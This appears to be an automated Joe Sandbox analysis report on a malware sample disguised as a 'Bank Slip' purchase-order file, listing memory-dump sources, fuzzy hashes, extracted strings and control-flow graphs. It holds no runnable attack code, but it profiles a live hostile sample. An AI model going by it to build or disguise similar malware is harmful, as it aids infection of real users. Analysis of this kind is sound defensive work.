                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                                        • Instruction ID: 7b198bd8e7b458dfc82464159d4177059c9417511057ac3f881cc995840d23bb
                                                                                                        • Opcode Fuzzy Hash: e0ba1911d6b534125fb269931e9bea29c2924a96b68648d919b0e9f6bcb2050f
                                                                                                        • Instruction Fuzzy Hash: D390022124540802D240715884187074086D7D4601F55C021A0024564DC6168B6567B2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                                        • Instruction ID: bf70bc150b8b0e5a58672f0da946d4d94266f4c88b94360583737b231a3d456d
                                                                                                        • Opcode Fuzzy Hash: 9c4409941e3e5282aa674682ce5707d7211f039a99316ba5a0173dae1d5f0d11
                                                                                                        • Instruction Fuzzy Hash: 2290022124945102D250715C44086168085B7E4201F55C031A08145A4DC5558A556322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                                        • Instruction ID: 009cc0530e7b1b6bdb5bca36348f692083311b3074fa65884ccdd8187048ac25
                                                                                                        • Opcode Fuzzy Hash: 735044948f1edc91db0943d4322375a31225f505ef0b7f54e71da1c9b7a52eec
                                                                                                        • Instruction Fuzzy Hash: 2D90023520540402D6107158580864640C697D4301F55D421A0424568DC6548AA1A222
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                                        • Instruction ID: 5e56b9b4fa441f21852923bb7dbad198a659d6b815cd7cbd22da94c25f33fcd2
                                                                                                        • Opcode Fuzzy Hash: 95ee7e2fb3fcb482b3687691da2d50cb202350541f82b4384b47714275fc153e
                                                                                                        • Instruction Fuzzy Hash: 6190023120640142964072585808A4E818597E5302B95D425A0015564CC9148A615322
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction ID: ad845efdc78c852db2baae793369cbdd99d8e48f166cbc3396e1b2cd4a36796c
                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                        • Instruction Fuzzy Hash:
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                                        • Instruction ID: 74fad6ec5455cf71629af8be2d18d19d821f75ede45a8b59d2a52d845f259943
                                                                                                        • Opcode Fuzzy Hash: 3984864962ffd206435a452c4f62a95ad2eba53939babf565037f0def3d438c0
                                                                                                        • Instruction Fuzzy Hash: 0F51F9B5A0421ABFDB25DBACCC9097EFBF8BB082407148169F455E7646D374DF4187A0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                        • API String ID: 48624451-2108815105
                                                                                                        • Opcode ID: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                                        • Instruction ID: 7e997d2febe126dace6dbb33cc9d665e1c2cc5b46bd2a691250507c46d86bfa7
                                                                                                        • Opcode Fuzzy Hash: c51f1d8cf00e59f292c841046492e08cbfdfa8749b84e4aece1b7b697e11b3ce
                                                                                                        • Instruction Fuzzy Hash: 2951F575A08649AFCB20DE9CD89097EFBFAEF48300B048459F496C7641EAB4DB40C7A0
                                                                                                        Strings
                                                                                                        • Execute=1, xrefs: 01804713
                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 01804655
                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 01804725
                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 018046FC
                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 01804742
                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 01804787
                                                                                                        • ExecuteOptions, xrefs: 018046A0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                        • API String ID: 0-484625025
                                                                                                        • Opcode ID: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                                        • Instruction ID: 14a3957569050ce24abca95974e5778a089ec17e6449d15975882edd4cc000dc
                                                                                                        • Opcode Fuzzy Hash: 40cff2c5f4fbccf5d7a38e444d457ca23646368f486634c129314aa4e467f835
                                                                                                        • Instruction Fuzzy Hash: 4D51267160021DAAEF25AAA8DC99BAEF7B8EF14B00F0400EDD605A7181EB709B458F50
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-$0$0
                                                                                                        • API String ID: 1302938615-699404926
                                                                                                        • Opcode ID: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction ID: 60d5923a0da840c0473ac73ac1afda2e3b02cbcc376b00b8fb326f8d6b00d551
                                                                                                        • Opcode Fuzzy Hash: 67cbaaaa089a52c9565608c335445b38513441175a6f8a80d34fd58ab3f25221
                                                                                                        • Instruction Fuzzy Hash: 9D81A070E4524D9FEF258E6CC8917FEFBB1AF46360F1E425AE861A7291C7349840CB61
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                        • API String ID: 48624451-2819853543
                                                                                                        • Opcode ID: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                                        • Instruction ID: 91eb755b2e585d7b8bae1926066ec4f3dd823c38b30fe142a21e609db9107605
                                                                                                        • Opcode Fuzzy Hash: 96b51515d9a49118bf7fadd51163d17543b38cbd81d33b0649b4783178d8226c
                                                                                                        • Instruction Fuzzy Hash: CD21517AA0051DABDB10DF69D844AAEBBF9AF58744F040126F905E3204EB30EA01CBA1
                                                                                                        Strings
                                                                                                        • RTL: Re-Waiting, xrefs: 0180031E
                                                                                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 018002E7
                                                                                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 018002BD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                                                                        • API String ID: 0-2474120054
                                                                                                        • Opcode ID: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                                        • Instruction ID: d67ed5f69d91113b7b4912a22249ac0df49a3e257da353add00a1df56c8e8430
                                                                                                        • Opcode Fuzzy Hash: 44cb80b936c91fef0c63ad4eeff5b2c9a99cd392dc5ddca842d45d5c147b25f8
                                                                                                        • Instruction Fuzzy Hash: CCE1BC306087469FD726CF28CC84B6ABBE0BB84B54F140A6DF5A5CB2E1D774DA44CB42
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 01807B8E
                                                                                                        • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 01807B7F
                                                                                                        • RTL: Re-Waiting, xrefs: 01807BAC
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 0-871070163
                                                                                                        • Opcode ID: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                                        • Instruction ID: 5a2b8700d80ca0c5a83a9a4779922a41d3f5936c0a56f32b8947b7a7f66ae4a7
                                                                                                        • Opcode Fuzzy Hash: 2009c07050155d3eca9412a86123cdaa369b4d7d194c8f6335c91e3c2064776b
                                                                                                        • Instruction Fuzzy Hash: 7041CF317047079BD721DE29CC51B6AB7E5EB98B10F000A1DFA9ADB780DB31E9058B92
                                                                                                        APIs
                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0180728C
                                                                                                        Strings
                                                                                                        • RTL: Resource at %p, xrefs: 018072A3
                                                                                                        • RTL: Re-Waiting, xrefs: 018072C1
                                                                                                        • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 01807294
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                        • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                        • API String ID: 885266447-605551621
                                                                                                        • Opcode ID: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                                        • Instruction ID: 7050d5ca363e4ae562d84603a738396d11b9213e6a98642fd6bae2c3901d61db
                                                                                                        • Opcode Fuzzy Hash: 6facce7decf71e09af56c5c8c335a7a8a50ee645aa7c8bc2cdfa55777cdd7939
                                                                                                        • Instruction Fuzzy Hash: 7341127160420AABC721CE29CC42B66F7A5FF94B50F10061CF996DB280DB30FA5687D1
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ___swprintf_l
                                                                                                        • String ID: %%%u$]:%u
                                                                                                        • API String ID: 48624451-3050659472
                                                                                                        • Opcode ID: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                                        • Instruction ID: 815873299e08316178778efd42b26061ff09c9749a755251a14a29620a59a8e0
                                                                                                        • Opcode Fuzzy Hash: ebceabd5d3423b14cf3304ca19404d3bcd8e95d5e1fede8e2a7c69c864f6a5e9
                                                                                                        • Instruction Fuzzy Hash: C0314F72A0062D9FDB20DF2DDC44BAEB7F9EB54710F54455AF949E3244EF30AA448BA0
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: +$-
                                                                                                        • API String ID: 1302938615-2137968064
                                                                                                        • Opcode ID: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction ID: 7545df9eb6f2718606692a5f984381c105600b05939f10efcecd7f129ac1c82d
                                                                                                        • Opcode Fuzzy Hash: 99ca5d320493ee8ecfac6479c2384e7848b43d072adb6e2058c73728248a7f31
                                                                                                        • Instruction Fuzzy Hash: 8291B271E0021E9BEB38DF6DC881ABEFBB1EF44328F54455AE955E72C4E73089818761
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000002.00000002.1974347040.0000000001760000.00000040.00001000.00020000.00000000.sdmp, Offset: 01760000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_2_2_1760000_PO1268931024 - Bank Slip.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $$@
                                                                                                        • API String ID: 0-1194432280
                                                                                                        • Opcode ID: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                                        • Instruction ID: 77ce82aa303c67f46c016b86ca409547d03810b0bafd4f46f87e2d02fd2ec5d3
                                                                                                        • Opcode Fuzzy Hash: de824c4c3a53d4ec9959c307d3afd162fb85e0c815c6f57e330c104bb41df6bd
                                                                                                        • Instruction Fuzzy Hash: 76810C71D002699BDB35CB54CC45BEEB7B4AF48714F1041DAEA19B7680E7309E84CFA0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:2.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:3
                                                                                                        Total number of Limit Nodes:0
                                                                                                        execution_graph 25524 6c29cfd 25525 6c29d17 25524->25525 25526 6c29d26 closesocket 25525->25526

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 271 433a9a5-433a9b3 272 433aa15-433aa2b 271->272 273 433a9b5 call 433a038 271->273 275 433aa33-433aa82 272->275 276 433aa2d 272->276 277 433a9ba-433a9bb 273->277 278 433aa84 275->278 279 433aa8a-433aad7 275->279 276->275 278->279 280 433aad9 279->280 281 433aadf-433ab3b 279->281 280->281
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 60840ff1d3d6c83c72dfa3690c564a1227479836e22c21005ff50a422e0441b9
                                                                                                        • Instruction ID: 66ed6020b9f97784c304a87dfaa8da5b6298fc0597c9899c2585df662d1af596
                                                                                                        • Opcode Fuzzy Hash: 60840ff1d3d6c83c72dfa3690c564a1227479836e22c21005ff50a422e0441b9
                                                                                                        • Instruction Fuzzy Hash: 2031B2126597F14ED30E836D08BD675AEC28E5720274EC2EEDADA5F2F3C4888408D3A1

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: "$#$($($+$-$-O$1$8L$:$:$<V$?%$BA$C$Pf$Pf$T$WA$]$^$b$c}$d$t$v"$vO$y$,$6
                                                                                                        • API String ID: 0-904472534
                                                                                                        • Opcode ID: 8967e8ea9d4151fd1ac004421b17ebc51aa6da070bfaaa4bc2d454741e874210
                                                                                                        • Instruction ID: bc7fe372e2649c033816d4b787e295f711df3cfc85c0debb89a45e20a43174b4
                                                                                                        • Opcode Fuzzy Hash: 8967e8ea9d4151fd1ac004421b17ebc51aa6da070bfaaa4bc2d454741e874210
                                                                                                        • Instruction Fuzzy Hash: 9042C1B0D0562ACBEB28CF44C988BEDBBB1BF44309F1091D9C5596B784E3B56A85DF40

                                                                                                        Control-flow Graph

                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 6$@4>J$O$S$s
                                                                                                        • API String ID: 0-336573888
                                                                                                        • Opcode ID: 008458fec8e27a19390f8bdf261c795cad7c23d34029cce3494b6d1879b9de6f
                                                                                                        • Instruction ID: 099a9e4d6eda7f73fff7e22cc5340ef5fb0e846bd3b0f030aa28672a0adb79c2
                                                                                                        • Opcode Fuzzy Hash: 008458fec8e27a19390f8bdf261c795cad7c23d34029cce3494b6d1879b9de6f
                                                                                                        • Instruction Fuzzy Hash: 1751A2B2911218ABDB10DFD4EC45EFEF3B8EF85314F1095A9ED0867150E770BA088BA1

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 142 6c29cfd-6c29d34 call 6c0189d call 6c2a8fd closesocket
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4162936515.0000000006BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6ba0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: closesocket
                                                                                                        • String ID:
                                                                                                        • API String ID: 2781271927-0
                                                                                                        • Opcode ID: 3c3f9efd77772d6bb4266c3ce1fc24f890e350a37af8794a1638db82256047b5
                                                                                                        • Instruction ID: 653df2a69da7ab63ffd3be8b0577c8a342194011e5232044650bbd0db23f2dd8
                                                                                                        • Opcode Fuzzy Hash: 3c3f9efd77772d6bb4266c3ce1fc24f890e350a37af8794a1638db82256047b5
                                                                                                        • Instruction Fuzzy Hash: AAE08C322003547BC250EAA9DC40EEBB36CDFC9320F04451AFA28A7201C670B95287F4

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 165 4354f78-4354fd6 call 4331388 168 4354ff3-4354ff9 165->168 169 4354fd8 call 4336fc8 165->169 171 4354fdd-4354ff0 call 4331208 169->171 171->168
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .|
                                                                                                        • API String ID: 0-325920452
                                                                                                        • Opcode ID: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
                                                                                                        • Instruction ID: 8cafeb9651597d265388b32aba59671b075480a2b91154cf466b4ec385ad598c
                                                                                                        • Opcode Fuzzy Hash: 178c32d8e1404a5789e4a2b4f9abf3e5fd93f9c54762f527bd92632bee4a25b9
                                                                                                        • Instruction Fuzzy Hash: 2501EDF2C11219AFDF50DFE8D9419EEBBF8AF08205F14466AE819F3240F7745A048BA1

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 209 4333988-43339c5 210 43339c8-43339da call 4347b98 209->210 213 43339f8-4333a31 call 4358618 210->213 214 43339dc-43339e6 210->214 218 4333a36-4333a3b 213->218 214->210 215 43339e8-43339f7 214->215 218->215 219 4333a3d-4333a59 call 4357f18 218->219 219->215 222 4333a5b-4333a7e call 43586f8 219->222 222->215 225 4333a84-4333aa7 call 43586f8 222->225 225->215 228 4333aad-4333acb 225->228
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a01469972955d78d782119378aacec6f2fc244d744f91c263757adf1f59e3886
                                                                                                        • Instruction ID: e541edb96d4bd33ee26133549de31b7312adefb7ea228953d6ec4ccfbe3ed29a
                                                                                                        • Opcode Fuzzy Hash: a01469972955d78d782119378aacec6f2fc244d744f91c263757adf1f59e3886
                                                                                                        • Instruction Fuzzy Hash: B94109B1D11218AFDB14CF99CC81AEEBBBCEF49710F10415AFA14E6240E7B1A640CBE4

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction ID: f1bcc5aac5a47ed8ea68ae84a403aff7e7f73c7ab4e70707770f479cccc4f598
                                                                                                        • Opcode Fuzzy Hash: 09255f75fd08aaf16a15e8c7a8ecc55cb742fe4f6a110c8cfe71c3456905ff00
                                                                                                        • Instruction Fuzzy Hash: 8F31B6B5A01248AFDB14DF98D881EDEBBF9EF88304F108119FD19A7340D774A955CB60

                                                                                                        Control-flow Graph

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        • Instruction ID: 81080fcfd4ad2661da365906905e4816f8b2a0ba341d856a0c96d6fa9f7802ea
                                                                                                        • Opcode Fuzzy Hash: 566983493f3b0ad038004870b7e3d902811479f30a7aef9b7590a4c5ec5d040b
                                                                                                        • Instruction Fuzzy Hash: 2FE0867364026877D62066999C0AFABB76CDFC5F60F090064FE289B351E574BA0482E4
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
                                                                                                        • Instruction ID: 3ea8ac60f433e560bf23b5666805dbdb4b537d29e363ecc400437e086925636c
                                                                                                        • Opcode Fuzzy Hash: 7a8a2f41192848a2a9c7c288ba1b486081d6e8814e3e5f8f3845d95ba6deab24
                                                                                                        • Instruction Fuzzy Hash: B9F02270815108ABEB08CF64E841FEDBBB8DF04320F2083AEEC19CB680E334A7508790
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ec153441bb58b225afd330b41f35dcfaf5457d31c716e3d19c2cdcccef337cd3
                                                                                                        • Instruction ID: af2b11ea46c32cea721cc419a2caebc240651e24db0827f6c0e37811394816fc
                                                                                                        • Opcode Fuzzy Hash: ec153441bb58b225afd330b41f35dcfaf5457d31c716e3d19c2cdcccef337cd3
                                                                                                        • Instruction Fuzzy Hash: 79E020734041166BC710495E5C404CAFB8CEB862353151221E85877161D731E401C7E0
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4158090763.00000000042A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 042A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_42a0000_eiVHpMoiongmS.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction ID: e3e8b69a0fd9adf8f42b7ae7fa072f1083226cf720d43f7531fbe79077a9fab0
                                                                                                        • Opcode Fuzzy Hash: f104d03abdedf1f8787786e7aaafcefc6a5242dd07684567bd9e54fffbad41ec
                                                                                                        • Instruction Fuzzy Hash: 8CE08C766402047BE620FA5AEC01FEB7B6CDFC5725F008015FE18A7281C675B91087B4
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.4162936515.0000000006BA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 06BA0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
